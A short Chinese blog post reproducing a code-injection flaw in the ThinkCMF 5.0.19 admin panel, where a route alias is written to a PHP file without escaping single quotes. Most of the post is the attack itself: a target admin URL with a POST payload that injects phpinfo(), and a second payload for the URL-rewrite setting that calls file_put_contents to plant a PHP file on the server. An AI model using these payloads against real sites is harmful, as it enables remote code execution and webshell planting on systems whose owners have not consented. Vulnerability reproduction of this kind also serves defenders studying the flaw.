前言
继续复现漏洞,持续关注thinkcmf。
描叙
thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。
过程
- 搭建环境。
下载地址
https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip
- 攻击脚本
http://thinkcmf5019.wwf/portal/admin_category/addpost.html
parent_id=0&name=111&alias=1'%3D%3Earray(%22%22)%2Cphpinfo()%2C'2


- 类似漏洞
在美化url那里也可以实现同等写入操作
先登录后台->设置->URL美化->添加URL规则->选择规则(这个随便选一个,但必须要从这里面选)->在显示网址处填写我们的payload保存即可。
'.file_put_contents('1.php','<?php phpinfo();').'

- 相关文章
网友评论